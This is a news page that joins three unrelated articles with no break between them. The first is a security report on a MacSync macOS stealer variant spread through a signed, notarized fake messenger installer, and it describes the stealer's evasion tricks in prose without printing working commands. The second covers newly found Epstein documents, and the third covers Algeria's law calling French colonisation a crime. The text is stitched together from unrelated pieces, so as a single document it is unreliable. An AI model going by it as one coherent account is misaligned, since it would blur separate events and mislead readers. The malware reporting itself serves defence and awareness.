Category: Uncategorized

Dec 24, 2025Ravie LakshmananMalware / Endpoint Security

Cybersecurity researchers have discovered a new variant of a macOS information stealer called MacSync that’s delivered by means of a digitally signed, notarized Swift application masquerading as a messaging app installer to bypass Apple’s Gatekeeper checks.

“Unlike earlier MacSync Stealer variants that primarily rely on drag-to-terminal or ClickFix-style techniques, this sample adopts a more deceptive, hands-off approach,” Jamf researcher Thijs Xhaflaire said.

The Apple device management firm and security company said the latest version is distributed as a code-signed and notarized Swift application within a disk image (DMG) file named “zk-call-messenger-installer-3.9.2-lts.dmg” that’s hosted on “zkcall[.]net/download.”

The fact that it’s signed and notarized means it can be run without being blocked or flagged by built-in security controls like Gatekeeper or XProtect. Despite this, the installer has been found to display instructions prompting users to right-click and open the app – a common tactic used to sidestep such safeguards. Apple has since revoked the code signing certificate.

The Swift-based dropper then performs a series of checks before downloading and executing an encoded script through a helper component. This includes verifying internet connectivity, enforcing a minimum execution interval of around 3600 seconds to enforce a rate limit, and removing quarantine attributes and validating the file prior to execution.

“Notably, the curl command used to retrieve the payload shows clear deviations from earlier variants,” Xhaflaire explained. “Rather than using the commonly seen -fsSL combination, the flags have been split into -fL and -sS, and additional options like –noproxy have been introduced.”

“These changes, along with the use of dynamically populated variables, point to a deliberate shift in how the payload is fetched and validated, likely aimed at improving reliability or evading detection.”

Another evasion mechanism used in the campaign is the use of an unusually large DMG file, inflating its size to 25.5 MB by embedding unrelated PDF documents.

The Base64-encoded payload, once parsed, corresponds to MacSync, a rebranded version of Mac.c that first emerged in April 2025. MacSync, per MacPaw’s Moonlock Lab, comes fitted with a fully-featured Go-based agent that goes beyond simple data theft and enables remote command and control capabilities.

It’s worth noting that code-signed versions of malicious DMG files mimicking Google Meet have also been observed in attacks propagating other macOS stealers like Odyssey. That said, threat actors have continued to rely on unsigned disk images to deliver DigitStealer as recently as last month.

“This shift in distribution reflects a broader trend across the macOS malware landscape, where attackers increasingly attempt to sneak their malware into executables that are signed and notarized, allowing them to look more like legitimate applications,” Jamf said.

US authorities have discovered more than a million more documents potentially related to the late paedophile Jeffrey Epstein that they plan to release in the coming days and weeks, officials say.

The US Attorney for the Southern District of New York and the FBI have informed the Department of Justice (DoJ) about the discovery and turned over the documents for lawyers to review.

“We have lawyers working around the clock to review and make the legally required redactions to protect victims, and we will release the documents as soon as possible,” the DoJ said on social media on Wednesday.

The department said that given the volume of material, the process could take “a few more weeks”.

The agency said it would “continue to fully comply with federal law and President Trump’s direction to release the files”.

The statement did not specify how the FBI and New York prosecutors came across the additional material.

The news comes after the justice department released thousands of documents last week – some heavily redacted – related to their investigations into Epstein.

The files were released after Congress passed the Epstein Files Transparency Act – signed into law by US President Donald Trump – that ordered the agency to share all the documents with the public while protecting victims’ identities.

Many of the documents released last week had names and other information blacked out, including names of people who the FBI appears to cite as possible co-conspirators in the Epstein case.

The justice department has faced criticism from lawmakers on both sides of the aisle over the amount of redactions in its files, which the law only permits in the case of protecting victims’ identities and active criminal investigations.

Algeria’s parliament has unanimously passed a law declaring France’s colonisation of the North African state a crime, and demanding an apology and reparations.

The law also criminalises the glorification of colonialism, state-run TV reports.

The vote is the latest sign of increasingly strained diplomatic relations between the two countries, with some observers saying they are at their lowest since Algeria gained independence 63 years ago.

France’s colonialisation of Algeria between 1830 and 1962 was marked by mass killings, large-scale deportations and ended in a bloody war of independence. Algeria says the war killed 1.5 million people, while French historians put the death toll much lower.

France’s President Emmanuel Macron has previously acknowledged the colonisation of Algeria was a “crime against humanity” but has not offered an apology.

Lawmakers wore scarves in the colours of the national flag and chanted “long live Algeria” as they applauded the bill’s passage through parliament, AFP news agency reports.

It says the legislation states that France has “legal responsibility” for the “tragedies it caused”, and “full and fair” compensation was an “inalienable right of the Algerian state and people”.

France has not yet commented on the vote.

It comes at a time of growing pressure on Western powers to offer reparations for slavery and colonialism, and to return looted artefacts still kept in their museums.

Algerian lawmakers have been demanding that France return a 16th Century bronze canon, known as Baba Merzoug, meaning “Blessed Father”, that was regarded as the protector of Algiers, now Algeria’s capital.

French forces captured the city in 1830, on their third attempt, and removed the cannon – which is now in the port city of Brest in north-western France.

In 2020, France returned the remains of 24 Algerian fighters who were killed resisting French colonial forces in the 19th Century.

Last month, Algeria hosted a conference of African states to push for justice and reparations.

Algeria’s Foreign Minister Ahmed Attaf said that a legal framework would ensure that restitution was neither regarded as “a gift nor a favour”.

Diplomatic relations between between Algeria and France soured last year, when Macron announced France was recognising Moroccan sovereignty of Western Sahara and backed a plan for limited autonomy for the disputed territory.

Algeria backs the pro-independence Polisario Front in Western Sahara and is seen as its main ally.

French-Algerian novelist Boualem Sansal was then arrested at Algiers airport in and jailed for five years, before being pardoned by Algeria’s President Abdelmadjid Tebboune last month.

Prosecutors said he had undermined national security for making remarks that questioned Algeria’s borders.